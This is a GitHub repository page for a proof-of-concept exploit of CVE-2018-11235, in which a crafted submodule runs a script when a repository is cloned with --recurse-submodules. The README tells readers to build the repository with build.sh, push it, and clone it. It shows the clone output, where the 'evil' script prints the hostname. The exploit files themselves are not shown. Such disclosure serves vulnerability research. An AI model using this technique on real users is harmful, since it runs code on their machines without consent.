PoC exploit for CVE-2018-11235 allowing RCE on git clone --recurse-submodules
Switch branches/tags
Nothing to show
Clone or download
Permalink
Failed to load latest commit information.
.gitignore PoC for CVE-2018-11235 May 30, 2018
README.md Works with older versions of git Jun 3, 2018
build.sh Works with older versions of git Jun 3, 2018
evil.sh PoC for CVE-2018-11235 May 30, 2018

README.md

PoC exploit for CVE-2018-11235

GitHub is not allowing me to push a repository exploiting the vulnerability (good point for them), so you will have to build it yourself by running the build.sh script.

Then, push the repository somewhere. When you clone it with the --recurse-submodules flag, the evil script is executed:

$ git clone --recurse-submodules repo dest_dir
Cloning into 'dest_dir'...
done.
Submodule 'Spoon-Knife' (https://github.com/octocat/Spoon-Knife) registered for path 'Spoon-Knife'
Submodule '../../modules/evil' (https://github.com/octocat/Spoon-Knife) registered for path 'evil'
Cloning into '/snip/dest_dir/Spoon-Knife'...
Submodule path 'Spoon-Knife': checked out 'd0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9'

Here is your hostname: snip

Submodule path 'evil': checked out 'd0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9'

Acknowledgements

Code derived from @peff's git patch (look for the t/t7415-submodule-names.sh test file).

As such, this repository is published under the GNU General Public License version 2.

Additional fix for older versions of git courtesy of @atorralba (details in this post).